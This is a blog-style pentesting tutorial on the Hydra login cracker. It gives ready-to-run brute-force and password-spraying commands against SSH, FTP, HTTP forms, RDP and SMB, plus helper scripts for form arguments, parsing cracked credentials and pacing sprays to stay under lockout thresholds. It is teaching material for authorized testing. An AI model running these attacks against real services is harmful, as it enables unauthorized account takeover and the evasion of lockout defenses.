Hydra: Brute Force Hacking Like a Pro
Hydra is a fast and flexible login cracker. It’s one of the most essential tools in a pentester’s arsenal when credentials are unknown and brute-forcing is on the table. Whether you’re testing SSH, HTTP forms, or even RDP, Hydra gets the job done with speed and precision.
In this post, we’ll cover everything a pentester needs to know to master Hydra — with examples, syntax, tips, and attack scenarios.
What Is Hydra?
Hydra (often called THC-Hydra) is a parallelized online login cracker: it sends real authentication attempts to a live service, as opposed to offline hash crackers such as John the Ripper or hashcat. It supports a long list of network protocols and is the standard choice for dictionary attacks against anything that asks for a username and password.
Key Use Cases for Pentesters
- Brute-forcing SSH logins
- Cracking HTTP login forms
- Testing default credentials on FTP, Telnet, RDP, and more
- Password spraying with control over speed and threads
Supported Services
Hydra supports a wide range of protocols. Some of the most common ones in real-world pentests include:
http-get, http-post-form, ssh, ftp, telnet, smb, rdp, vnc, smtp, pop3, imap, ldap2, ldap3, mysql, postgres, mssql
The full list of supported services is printed at the end of the help output, and each module documents its own options:
hydra -h                 # complete help; the supported services list is at the bottom
hydra -U http-post-form  # usage details for one module (replace with any module name)
Basic Syntax
hydra -L users.txt -P passwords.txt <service>://<target>[:<port>]
For example, against SSH (the second line is the equivalent older positional form, target first and then service; the http-post-form example further down uses that form because the module argument goes at the end):
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
hydra -L users.txt -P passwords.txt 192.168.1.10 ssh
Common Flags:
-L # Username list
-l # Single username
-P # Password list
-p # Single password
-e nsr # Also try an empty password (n), the username as password (s) and the reversed username (r)
-u # Loop over users for each password instead of passwords for each user (the order you want when spraying)
-s # Custom port (appending :<port> to the target does the same)
-V # Show every login/password attempt (-v is plain verbose mode)
-f # Exit after the first valid pair is found (-F stops globally when attacking several hosts with -M)
-t # Parallel connections per target (default 16)
-c # Seconds to wait between attempts, across all threads (forces -t 1); the knob for slow, lockout-aware runs
-o # Write found login/password pairs to a file (-b json for JSON instead of text)
Hydra in Action: Real-World Examples
1. Brute Force SSH
hydra -L users.txt -P rockyou.txt -t 4 -f ssh://192.168.1.100
# -t 4: four parallel connections; sshd caps unauthenticated connections (MaxStartups), so hydra itself warns to use -t 4 or lower for ssh
# -f: stop after the first valid pair
2. Brute Force FTP with Default Port
hydra -l admin -P passwords.txt ftp://192.168.1.20
3. HTTP POST Form Attack
hydra -l admin -P passwords.txt 192.168.1.50 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
# ^USER^ and ^PASS^ are replaced with each candidate username and password
# the module argument is colon-separated: <path>:<POST body>:<condition>[:H=<header>][:C=<cookie page>]; a literal colon inside any part must be escaped as \:
# F=incorrect means "the login failed if the response contains 'incorrect'"; S=<text> declares a success marker instead
To find the failure text, submit one deliberately wrong login and read the response in Burp Suite or the browser's developer tools. Pick a string that appears only on failure: many applications answer a successful login with a redirect rather than page text, which makes F= easier to pin down than S=. Use https-post-form (or -S) when the form is served over TLS, and note that a per-request CSRF token in the form defeats a static body like this one.
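Because the module argument is colon-delimited, the easiest way to get it wrong is a stray colon in a cookie header or in the failure string. The helper below is an added example, not code from the original post or from the Hydra project: it assembles the argument from its parts, escapes colons the way hydra expects, and refuses a body that lacks the placeholders. The form fields, the cookie value, passwords.txt and 192.168.1.50 are all made up.

```shell
#!/usr/bin/env bash
# Build a hydra http-post-form argument from its parts.
# Hydra splits the argument on ':' into PATH:BODY:CONDITION[:H=hdr][:C=page],
# so any literal ':' inside a part has to be escaped as '\:'.

# Escape every ':' in $1 as '\:'.
hydra_escape() {
  printf '%s' "$1" | sed 's/:/\\:/g'
}

# Sanity check (our own, not hydra's): the body must carry both placeholders,
# otherwise there is nothing for hydra to substitute.
check_placeholders() {
  case "$1" in
    *'^USER^'*'^PASS^'*|*'^PASS^'*'^USER^'*) return 0 ;;
    *) echo "body needs ^USER^ and ^PASS^ placeholders" >&2; return 1 ;;
  esac
}

# build_form_spec PATH BODY CONDITION [EXTRA...]
#   CONDITION is F=<text seen only in failed responses> or S=<text seen only on success>
#   EXTRA entries are passed through, e.g. 'H=Cookie: PHPSESSID=abc' or 'C=/login.php'
build_form_spec() {
  local path="$1" body="$2" cond="$3"
  shift 3
  check_placeholders "$body" || return 1
  local spec
  spec="$(hydra_escape "$path"):$(hydra_escape "$body"):$(hydra_escape "$cond")"
  local extra
  for extra in "$@"; do
    spec="$spec:$(hydra_escape "$extra")"
  done
  printf '%s' "$spec"
}

# Print (do not run) the full hydra command for a single-user, wordlist attack.
hydra_form_cmd() {
  local target="$1" user="$2" wordlist="$3" spec="$4"
  printf "hydra -l %s -P %s %s http-post-form '%s'\n" "$user" "$wordlist" "$target" "$spec"
}

# Constructed demo values: host, field names, session cookie and failure text are made up.
SPEC=$(build_form_spec '/login.php' 'user=^USER^&pass=^PASS^' 'F=Login failed: bad credentials' \
                       'H=Cookie: PHPSESSID=0123456789abcdef')
hydra_form_cmd 192.168.1.50 admin passwords.txt "$SPEC"
```

The printed command wraps the argument in single quotes so the shell passes the escaped colons through untouched; the same escaping applies to colons in a success string or in any extra H= header.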
4. RDP Brute Force
hydra -t 1 -W 3 -L users.txt -P passwords.txt rdp://192.168.1.25
# RDP servers drop bursts of parallel connections; hydra's own warning for this module recommends -t 1 (or -t 4) with -W 1 or -W 3 seconds between connects
# RDP logins are usually domain accounts, so check the lockout policy before you start
5. SMB Brute Force
hydra -L users.txt -P passwords.txt smb://192.168.1.30
# newer releases also ship an smb2 module for hosts that have SMBv1 disabled; against domain-joined hosts every guess counts toward the domain lockout threshold
Fine-Tuning Your Attack
Set Threads for Speed
-t 16 # 16 parallel connections per target is the default; raise it only if the service tolerates it, lower it for ssh (4) and rdp (1)
More tasks only help if the service accepts that many simultaneous connections; past that point you get connection errors and missed hits, not speed. Before touching domain accounts, check the lockout threshold and reset window (net accounts /domain on a Windows host) and budget attempts per user accordingly. A burst of failed logons is also the easiest thing for a SOC to alert on.
Stop After First Hit
-f # Exit on first valid credentials (with -M targets this is per host; -F stops globally)
It does nothing for stealth, but it is the right choice when one working account is all you need, or to stop hammering a service you have already broken into.
Output to File
-o results.txt # text by default; add -b json for a JSON file
Keeps the found login/password pairs in a file you can parse later; progress and connection errors still go to the terminal. If a run is interrupted, -R resumes it from the hydra.restore file hydra leaves behind.
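Hydra writes one line per found pair in a fixed layout, and turning that into a CSV for the findings table is a few lines of sed and awk. The script below is an added example, not from the original post or the Hydra project; the results file it parses is constructed to match hydra's text format, not captured output, and the hosts and credentials in it are made up.

```shell
#!/usr/bin/env bash
# Convert hydra's text results (stdout or the -o file) into CSV.
# Each hit is one line: [PORT][SERVICE] host: HOST   login: USER   password: PASS
# (three spaces between fields); header/comment lines start with '#'.

# Constructed sample of a -o results file; nothing here is real.
SAMPLE_RESULTS='# Hydra v9.5 run at 2024-05-01 09:12:33 on 192.168.1.100 ssh (hydra -L users.txt -P passwords.txt -o results.txt ssh://192.168.1.100)
[22][ssh] host: 192.168.1.100   login: deploy   password: Spring2024!
[22][ssh] host: 192.168.1.100   login: admin   password: admin
[3389][rdp] host: 192.168.1.25   login: administrator   password: P@ss word'

# hydra_to_csv < results.txt  ->  host,port,service,login,password rows.
# The password is taken to the end of the line so spaces survive; a password
# containing a comma would need CSV quoting, which this example does not attempt.
hydra_to_csv() {
  echo 'host,port,service,login,password'
  sed -nE 's/^\[([0-9]+)\]\[([^]]+)\] host: ([^ ]+) +login: (.*)   password: (.*)$/\3,\1,\2,\4,\5/p'
}

# Number of distinct hosts with at least one valid pair (header row excluded).
count_hosts() {
  awk -F, 'NR > 1 { hosts[$1] = 1 } END { n = 0; for (h in hosts) n++; print n }'
}

# Logins whose password equals the username, the kind of hit -e s produces.
user_equals_pass() {
  awk -F, 'NR > 1 && $4 == $5 { print $4 }'
}

printf '%s\n' "$SAMPLE_RESULTS" | hydra_to_csv
printf '%s\n' "$SAMPLE_RESULTS" | hydra_to_csv | count_hosts
```

Feed a real results file with `hydra_to_csv < results.txt`; the header line hydra writes to -o files is skipped because it does not match the hit pattern.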
Advanced Tips
1. Password Spraying with One Password
hydra -L users.txt -p Spring2024 -u -t 6 ssh://192.168.1.100
# Try the same password across many users; common during internal pentests
# -u loops over users for each password, so with several passwords in -P every account sees at most one guess per pass through the list
# add -c <seconds> to pace attempts when the accounts sit behind a lockout policy
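Spraying domain accounts is where -c earns its keep. On a Windows account the bad-password counter resets only after the "Reset account lockout counter after" window passes with no further failure, so a constant delay that keeps each user's consecutive attempts further apart than that window never lets the counter climb past one. The script below, an added example that is not part of the original post or of Hydra, derives that -c value and the total run time from the policy and prints the resulting command; the 30-minute window, the 40 users, seasons.txt and 192.168.1.100 are made up.

```shell
#!/usr/bin/env bash
# Pace a password spray so that no account's bad-password counter exceeds 1.
# Model (Windows account lockout policy): the counter resets only after
# RESET_MINUTES pass with no failed logon, so consecutive guesses against the
# same user must be spaced further apart than that window.
# With hydra -u (loop users for each password) and -c DELAY (seconds between
# attempts over all threads; forces -t 1) the same user is retried every
# DELAY * USERS seconds.

# spray_delay RESET_MINUTES USERS [MARGIN_SECONDS] -> minimum -c value, rounded up
spray_delay() {
  local reset_min="$1" users="$2" margin="${3:-0}"
  local window=$(( reset_min * 60 + margin ))
  if [ "$users" -le 0 ]; then
    echo "need at least one user" >&2
    return 1
  fi
  echo $(( (window + users - 1) / users ))   # ceiling division
}

# spray_runtime_minutes PASSWORDS USERS DELAY -> wall-clock minutes for the whole run, rounded up
spray_runtime_minutes() {
  local passwords="$1" users="$2" delay="$3"
  echo $(( (passwords * users * delay + 59) / 60 ))
}

# spray_cmd USERLIST PASSLIST DELAY TARGET -> the hydra command line (printed, not run)
spray_cmd() {
  local userlist="$1" passlist="$2" delay="$3" target="$4"
  printf 'hydra -L %s -P %s -u -c %s -o spray-results.txt %s\n' "$userlist" "$passlist" "$delay" "$target"
}

# Constructed policy: 30-minute reset window, 40 users, 60 s safety margin, 4 seasonal passwords.
DELAY=$(spray_delay 30 40 60)
spray_cmd users.txt seasons.txt "$DELAY" ssh://192.168.1.100
echo "run time: $(spray_runtime_minutes 4 40 "$DELAY") minutes"
```

The numbers are sobering on purpose: with a 30-minute window and 40 users, one password pass takes about half an hour, so a four-password spray is a two-hour job, and a lockout threshold of 1 (or a policy you have not read) means do not spray at all.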
2. Single User, Many Passwords
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.0.0.5 -V
3. Custom Ports
hydra -L users.txt -P passwords.txt -s 2222 ssh://192.168.1.100
# Use if SSH is running on a non-standard port; ssh://192.168.1.100:2222 does the same
Hydra vs Medusa vs Ncrack
| Tool | Highlights |
|---|---|
| Hydra | Broadest module list, flexible HTTP form module, -M for many targets in one run |
| Medusa | Thread-based, modular design; often faster across many hosts and many users |
| Ncrack | From the Nmap project, with timing templates and an adaptive engine; a common pick for RDP |
Final Thoughts
Hydra is a powerful brute-forcing tool, but it’s up to you to use it responsibly. Always validate scope and authorization. In internal tests, it can quickly uncover weak credentials, default logins, or exposed admin panels — all leading to deeper compromise.
Next time you're stuck at a login prompt with a username and a hunch, let Hydra loose.
